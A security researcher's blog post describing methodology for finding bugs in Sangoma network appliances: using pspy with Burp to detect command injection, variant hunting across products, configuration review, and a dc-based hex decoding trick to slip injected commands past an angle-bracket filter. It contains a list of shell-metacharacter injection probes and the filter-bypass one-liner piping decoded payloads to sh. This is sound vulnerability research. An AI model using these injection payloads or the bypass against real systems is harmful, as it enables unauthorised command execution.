Process/Whatever Notes from the Sangoma Research.

This is part of a series of posts on the Sangoma exploits I released at BSides Basingstoke 2024.

This post is just to note down a couple of the "process/methodology" parts. It isn't exhaustive, or even nearly complete, but it should give an idea as to how I was working.

I do intend to - once I've published more examples with other vendors - eventually write a proper article on my methodology for exploring network appliances and suchlike with the goal of finding bugs.

pspy + Burp Repeater = command/argument injection findings.

This is absurdly simple to do, and should be part of everyone's manual testing cycle when it comes to web apps that you suspect contain shell command injection issues.

Your first step is to drop pspy on the target and run it, piping output to a file.
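Something like this, as a minimal sketch - assuming the usual static pspy64 build, with tee so you can still watch it live:

    # on the target -- log everything pspy sees while you poke the app
    ./pspy64 2>&1 | tee /tmp/pspy.log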

Your next step is to go through every single input/parameter in the app and send a unique, findable string with a prefix you can grep for. Use Repeater for this.

Leave pspy running and interact with the application "normally" for a while also, to find "second order" issues. These may be a bit harder to track down 😄

The last step is to grep for the prefix in the pspy log and see if any of your "inputs" showed up in a process's command line. If they did, correlate them to a request in Burp.
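Concretely, if every payload carried a made-up tag like PSPYX (pick your own), the correlation step is a one-liner:

    # payloads looked something like PSPYX-login-username, PSPYX-backup-host, ...
    # -a in case pspy output contains stray non-text bytes
    grep -a 'PSPYX' /tmp/pspy.log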

Now you have some potential shell/argument injection issues to follow up on, and a good idea what input and endpoint caused what command line to run. This will massively narrow down where you need to spend serious amounts of time on code auditing.

You can also just fuzz these inputs with a bunch of shell metacharacters and use pspy to see if anything works, instead of auditing code.
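If you go that route, a starter list of probes might look something like the below - each one wraps a marker command (id here) so hits stand out in the pspy log, and the variants cover a few different quoting contexts:

    ;id
    |id
    `id`
    $(id)
    &&id
    ';id #
    ";id #
    %0aid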

This is actually how I initially noticed the TabbyPass issue - I was putting in random username strings and monitoring pspy in another terminal window, and noticed "something", which led me down the path of code review to work out what the hell was going on. It also helped a lot with finding all those shell command injection problems.

Now, there is a potential way to automate this whole process in Burp using either an extension or a BCheck script. I've written a couple of attempts at this, but nothing I'm happy with yet. Here is how I would do it (a rough sketch of the target-side piece follows the list).

  1. Have Burp simply shove a unique Collaborator URL into each input field "automatically" as a scan rule.
  2. On the target, have something watching the pspy logs for Collaborator URLs. If it sees one - send the log entry as POST data to the Collaborator URL.
  3. On the Burp side, raise an issue of "User input passed to command line", with the data sent to Collaborator and the responsible request.
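A rough sketch of the target-side watcher (step 2) could be as dumb as this - the oastify.com pattern is just an example, match whatever your Collaborator domain actually looks like:

    #!/bin/sh
    # watch pspy output for Collaborator URLs; when one appears,
    # POST the offending log line back to that URL so Burp can flag it
    PATTERN='[a-z0-9]{20,}\.oastify\.com'
    tail -F /tmp/pspy.log | grep -E --line-buffered "$PATTERN" | while read -r line; do
        url=$(printf '%s\n' "$line" | grep -oE "$PATTERN" | head -n 1)
        curl -s --data-urlencode "log=$line" "http://$url/" > /dev/null
    done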

You could probably replace pspy with some eBPF shenanigans or hooks and catch stuff like file creation bugs/file writes/reads in the same kind of way, doing OS-level IAST, but that is a whole fucking tangent for another time - and probably worthy of a whole research project.

Hunting for variants across products.

When working with multiple products from a vendor, if you find something in one place, odds are you will find it - or something similar - somewhere else, as vendors have a habit of reusing the same code across multiple products.

It is also worthwhile searching for prior issues in a product and looking for incomplete fixes, or checking whether fixes were applied to the vendor's other products. Had I been aware of the prior work by the folks at Appsecco, I'd have been able to find the TabbyPass issue a LOT quicker.

Another example is - when I found the "session hijacking via directory listing" issue in the VideoMCU, I was able to quickly spot that it also impacted the NTG product, which uses largely the same codebase. Implementing the NTG exploit after working out the VideoMCU one took minutes of work.

There are a few other potential "duplicate issues" across products that I have not yet had time to properly validate and document.

This also came into play with the "modules" in FusionPBX - finding one file read/write issue led to finding the same issue in other modules, thanks to shared code.
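Mechanically this can be as crude as grepping every product tree you have for the dodgy construct you already found - the paths and pattern here are made up for illustration:

    # -F: fixed string, no regex surprises
    grep -rnF 'exec($_' --include='*.php' /research/product-a/ /research/product-b/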

Start with a configuration review.

Once you have a shell to work with - via SSH or some jailbreak - on an appliance, your first port of call should be checking configurations.

See what services are running, if they are exposed externally (verify with a port scan), and where their configurations live. This will massively cut down on effort and usually will point you in the correct directions.
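The first few minutes of that usually look something like this - nothing clever, just orientation (adjust for whatever userland the appliance actually has):

    ps aux                                    # what's running, and as which user?
    netstat -peanut                           # what's listening, and on which interfaces?
    sudo -l                                   # any insane sudo rules?
    grep -rn 'root ' /etc/nginx/ 2>/dev/null  # webroot -> where the app code lives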

In this research it told me that nginx ran as root on one appliance, gateone ran as root on another, that sudo permissions were written by an insane person, and where to start looking for the actual application codebase on the device.

Configurations can also give you hints at how to find the target devices on Shodan or whatnot.

Comparing netstat -peanut to nmap output can tell you if there are potentially "locally exposed" targets that might be reverse proxied or reachable by SSRF or similar.
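A quick and dirty way to diff the two views - run each half where it belongs, copy the local list over, then comm them:

    # on the appliance: listening TCP ports (UDP lines don't say LISTEN, eyeball those)
    netstat -peanut | awk '/LISTEN/ {n=split($4,a,":"); print a[n]}' | sort -u > local-ports.txt

    # from your attacking box (TARGET is a placeholder)
    nmap -p- -oG - TARGET | grep -oE '[0-9]+/open' | cut -d/ -f1 | sort -u > remote-ports.txt

    # ports listening locally but unreachable remotely = reverse proxy / SSRF candidates
    comm -23 local-ports.txt remote-ports.txt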

Related to the above point about prior art and variants - it's worth checking if anything running has known issues. Read bug trackers.

Keep notes of old tricks.

With the VideoMCU and NTG appliances, the command injections were restricted by an extremely annoying "filter" applied to form variables that blocked angle brackets.

Luckily, from a piece of prior work I had done, I had a very simple "encoder/decoder" using the "dc" command line calculator to convert a payload from hex back to ASCII on the target, without needing angle brackets.
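The trick looks roughly like this - the payload and paths are illustrative, and note that dc wants uppercase hex, since lowercase a-f are dc commands:

    # locally: hex-encode the real payload (which can contain angle brackets)
    PAYLOAD='echo pwned > /tmp/pwned'
    HEX=$(printf '%s' "$PAYLOAD" | xxd -p | tr -d '\n' | tr 'a-f' 'A-F')

    # what gets injected on the target: decodes and runs the payload,
    # with no angle brackets anywhere on this line
    dc -e "16i${HEX}P" | sh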

Had I not remembered this trickery, I'd probably have had to run multiple injection attempts to stage a payload onto the target.

I'll leave it at that for now. The next post will basically be a wrap-up of this project (for now) where I try to count all the bugs, etc.